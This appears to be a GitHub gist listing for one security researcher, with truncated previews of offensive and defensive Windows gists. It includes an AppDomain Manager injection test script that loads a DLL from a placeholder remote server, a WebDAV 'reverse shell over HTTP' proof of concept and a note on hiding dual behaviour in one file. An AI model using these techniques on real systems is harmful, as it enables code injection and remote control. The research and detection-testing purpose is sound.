@secdev02
secdev02 / singlepage.html
Created March 10, 2026 22:18
Free Your Mind - Single Page App - Game and JS Physics
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Physics Construct</title>
<style>
@import url('https://fonts.googleapis.com/css2?family=Share+Tech+Mono&family=Orbitron:wght@400;700;900&display=swap');
:root {
@secdev02
secdev02 / AppDomain_test.ps1
Last active January 30, 2026 18:34
Quick and simple test harness
# AppDomain Manager Injection Detection Tests
# This script tests three methods of AppDomain Manager injection
param(
[string]$TestExecutable = "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
[string]$RemoteServer = "http://yourserver.com/tasks.dll",
[string]$Base64RemoteDll = ""
)
$ErrorActionPreference = "Stop"
@secdev02
secdev02 / README.md
Created January 27, 2026 23:59
Task Manager

Get-ScheduledTask | Where-Object {$_.Actions.Execute -like 'cmd.exe'} | Select-Object TaskName, TaskPath, State

Get-ScheduledTask | ForEach-Object {
    $task = $_
    $_.Actions | Where-Object {$_.Execute -like '*cmd.exe*'} | ForEach-Object {
        [PSCustomObject]@{
            TaskName = $task.TaskName
            TaskPath = $task.TaskPath
            State = $task.State
@secdev02
secdev02 / gist:40e463f2728ebf5058a83c454ab5b06d
Created January 22, 2026 04:49
Equation Group windbreaker dump file
Microsoft (R) Windows Debugger Version 6.12.0002.633 X86
Copyright (c) Microsoft Corporation. All rights reserved.
Loading Dump File [C:\dumps\regret.dmp]
User Mini Dump File: Only registers, stack and portions of memory are available
Symbol search path is: SRV*c:\symbols*http://msdl.microsoft.com/download/symbols
Executable search path is:
Windows XP Version 2600 (Service Pack 2) MP (2 procs) Free x86 compatible
Product: WinNt, suite: SingleUserTS
@secdev02
secdev02 / README.md
Created January 4, 2026 02:38
OGhidra - Analysis

============================================================ [09:00:11] 🚀 SMART TOOL: RENAME ALL FUNCTIONS

Starting OPTIMIZED bulk function analysis with mode: smart_enumeration

============================================================ [09:00:11] ⚡ PERFORMANCE ENHANCEMENTS

• Batch processing (size: 50)

@secdev02
secdev02 / webdav_minimalist.ps1
Created December 21, 2025 18:07
Minimalist - PowerShell WebDAV - Decoy Share
<#
Obtained from https://github.com/re4lity/subTee-gits-backups/blob/master/JEWebDav.ps1
#>
<#
.SYNOPSIS
Simple Reverse Shell over HTTP. Deliver the link to the target and wait for connectback.
Read And Write Files Over WebDAV Proof Of Concept
@secdev02
secdev02 / bginteger.py
Created December 17, 2025 20:02
Factorial Mod N - GCD
import math
import time
def gcd_factorial_efficient(n):
    """Compute GCD(sqrt(n)!, n) efficiently"""
    sqrt_n = int(math.sqrt(n))
    g = n
    print(f"Computing GCD({sqrt_n}!, {n})")
    print(f"Processing {sqrt_n} numbers...\n")
@secdev02
secdev02 / README.md
Created December 17, 2025 18:35
Capability Diffusion - Part Two

A single file that has 2 different ways of behaving

In this case we simply load and compile 2 different C# calls.

Use your imagination.

@secdev02
secdev02 / HelloWorld.cs
Created December 17, 2025 18:06
Capability Diffusion - Sound of Silence - Basic Example.
using System;
using System.Configuration;
using System.IO;
using System.Net;
namespace HelloWorldLib
{
public class HelloWorld
{
private static Configuration _config;
@secdev02
secdev02 / bindiff.ps1
Last active December 16, 2025 23:37
Extractor
<#
.SYNOPSIS
Extracts a specific file from nested CAB files within an MSU package.
.DESCRIPTION
Extracts MSU to get CAB files, then extracts a specific file by name,
and performs additional expansion rounds if the file is itself a CAB.
.PARAMETER MsuPath
Path to the MSU file.